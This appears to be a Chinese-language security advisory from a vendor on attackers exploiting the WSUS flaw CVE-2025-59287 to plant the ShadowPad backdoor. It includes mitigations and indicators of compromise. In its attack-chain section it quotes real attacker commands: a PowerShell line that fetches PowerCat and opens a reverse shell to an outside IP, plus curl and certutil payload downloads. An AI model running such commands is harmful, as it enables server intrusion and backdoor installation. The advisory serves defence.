
自今 (2025) 年 10 月 14 日微軟發佈漏洞公告及 10 月 22 日公開 PoC 後,攻擊者迅速武器化此漏洞,針對啟用 Windows Server Update Services (下稱 WSUS) 的 Windows 伺服器發動攻擊。多個來源皆觀察到,現實場域中的微軟 WSUS 重大 Remote Code Execution (下稱 RCE)漏洞(CVE-2025-59287)已被投放 ShadowPad 後門程式。攻擊者利用 PowerCat 取得系統層級 shell,運用系統內建工具(curl 與 certutil),以 DLL 側載方式部署並安裝 ShadowPad。
此事件主要警示在於:從微軟公開 PoC 到野外濫用僅數日,可以修補漏洞的時間極為短暫。攻擊者濫用 PowerShell、certutil.exe、curl.exe等常見工具,減少對已知惡意程式的依賴,更增加特徵碼偵測困難度。ShadowPad 透過 DLL 側載主要在記憶體內執行,注入常見 Windows 程序,並藉由 Run key 及排程任務維持存活,降低被偵測機率,實現長期存取。所有運行 WSUS 的 Windows 伺服器,特別是暴露於網際網路(TCP 8530/8531)或存取控管薄弱者將會是主要受影響者。
描述
ShadowPad 是一款私人販售、多為具中國國家背景 APT 組織所用的後門,能建立隱蔽且持久的存取通道,透過 443 埠的 HTTP/HTTPS、模仿瀏覽器的標頭並混淆正常流量。WSUS 則是企業核心基礎設施,駭客可透過 RCE 漏洞、遠端取得 WSUS 上的系統權限作為初始立足點,進而控制整個場域並橫向移動。
偵查 (Reconnaissance)
攻擊者遍歷於 TCP 8530/8531 存取的 WSUS 伺服器,尋找適合以 CVE-2025-59287 (WSUS RCE)攻擊的目標。
初始存取 (Initial Access)
利用 CVE-2025-59287 以 SYSTEM 權限在目標伺服器執行命令,攻擊者隨即用 PowerShell 下載並執行 PowerCat,獲得互動式 CMD shell。
powershell.exe-c IEX (New-Object System.Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1’)
;powercat -c 154.17.26[.]41 -p 8080 -e cmd
執行 (Execution)
獲得初始存取後,再執行合法的 Windows 公用程式 curl.exe 和 certutil.exe,以安裝 ShadowPad 惡意軟體。
curlhxxp://149.28.78[.]189:42306/tmp.txt -o C:\users\%ASD%\tmp.txt & curlhxxp://149.28.78[.]189:42306/dll.txt -o C:\users\%ASD%\dll.txt & curlhxxp://149.28.78[.]189:42306/exe.txt -o C:\users\%ASD%\exe.txt certutil-decode C:\users\%ASD%\tmp.txt C:\programdata\0C137A80.tmp
DLL 側載觸發 ShadowPad
將合法 EXE 與惡意 DLL 放在一起,確保受信任執行檔載入惡意 DLL,進而解密或載入 ShadowPad 核心,此程序完全於記憶體執行。
持續性(Persistence)
防禦規避(DefenseEvasion)
命令與控制(Commandand Control)
外洩(Exfiltration)
透過 C2 通道163.61.102[.]245:443 外洩資料。
移除 WSUS RCE 攻擊向量
所有 WSUS 伺服器套用微軟針對 CVE-2025-59287 的安全更新,重開機完成緩解,便可移除本事件被濫用的 RCE 向量。如需延後修補,建議暫時停用 WSUS 伺服器角色,或於主機/邊界防火牆阻斷 TCP 8530/8531。
管理 WSUS 曝險
應將 WSUS 移至防火牆後方以取消外網曝險,僅開放必要子網與管理員存取。限制其連外對象僅限 Microsoft Update,並封鎖 8530/8531 埠的非必要進端流量。建議強制使用 8531 HTTPS 通訊並關閉 8530 HTTP 連線。
WSUS 主機安全配置
使用最小權限帳號登錄 ACL,防止在未授權情況下寫入 Program Files、ProgramData、AppData 與 Temp。強制執行 AppLocker/WDAC 允許清單,僅運行已核准簽署的二進位檔,封鎖未授權路徑之 DLL 側載。透過維持 SafeDllSearchMode 與移除冗餘軟體,減少 DLL 側載攻擊面。
偵測並封鎖惡意基礎設施
企業應主動監控並封鎖與事件相關的惡意基礎設施,IP、URL、相關樣本 hash 等,可以參考 IOC 章節。
IP
URL
HTTP://163.61.102[.]245:443
惡意檔案路徑(File Paths)
帶有 Q-X64 參數的執行指令
奧義智慧 (CyCraft) 是亞洲領先的 AI 資安科技公司,專注於 AI 自動化威脅曝險管理。其 XCockpit AI 平台整合 XASM (Extended Attack Surface Management) 三大防禦構面:外部曝險預警管理、信任提權最佳化監控,與端點自動化聯防,提供超前、事前、即時的縱深防禦。憑藉其在政府、金融、半導體高科技產業的深厚實績與 Gartner 等機構的高度認可,奧義智慧持續打造亞洲最先進的 AI 資安戰情中心,捍衛企業數位韌性。